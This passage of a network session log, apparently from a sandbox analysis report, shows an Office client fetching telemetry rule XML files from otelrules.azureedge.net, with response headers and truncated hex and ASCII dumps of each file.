                                                                                                                                                                                  x-azure-ref: 20241123T185310Z-174c587ffdfn4nhwhC1TEB2nbc00000003gg000000000cdt
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  112192.168.2.74984413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:10 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:10 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1401
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE055B528"
                                                                                                                                                                                  x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185310Z-178bfbc474b9fdhphC1NYCac0n00000004vg00000000488n
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:11 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  113192.168.2.74984913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:11 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1397
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE7262739"
                                                                                                                                                                                  x-ms-request-id: e7fe902a-801e-0067-6164-3bfe30000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185311Z-178bfbc474bw8bwphC1NYC38b400000004p000000000ckcf
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  114192.168.2.74985013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:11 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                  x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185311Z-178bfbc474b7cbwqhC1NYC8z4n00000004t0000000009tca
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  115192.168.2.74985113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:11 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1360
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                  x-ms-request-id: 358685dd-301e-005d-4f7d-3be448000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185311Z-174c587ffdf8lw6dhC1TEBkgs800000003dg000000001s91
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  116192.168.2.74986213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:13 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1397
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                  x-ms-request-id: 4b825c62-901e-008f-3f5c-3b67a6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185313Z-178bfbc474btvfdfhC1NYCa2en00000004yg000000008a98
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:14 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  117192.168.2.74986613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:13 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:14 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:14 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1360
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                  x-ms-request-id: e88bdfa1-301e-003f-630e-3d266f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185314Z-178bfbc474bp8mkvhC1NYCzqnn00000004u0000000000bn6
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:14 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  118192.168.2.74986713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:13 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:14 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                  x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185314Z-178bfbc474bxkclvhC1NYC69g400000004s000000000cya7
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:14 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  119192.168.2.74985713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:13 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:14 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1366
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                  x-ms-request-id: 40694bf4-501e-008c-7530-3ccd39000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185314Z-178bfbc474bpnd5vhC1NYC4vr400000004ug00000000c8cd
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  120192.168.2.74986813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:13 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:14 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1390
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE3002601"
                                                                                                                                                                                  x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185314Z-178bfbc474btvfdfhC1NYCa2en00000004x000000000ct03
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:14 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
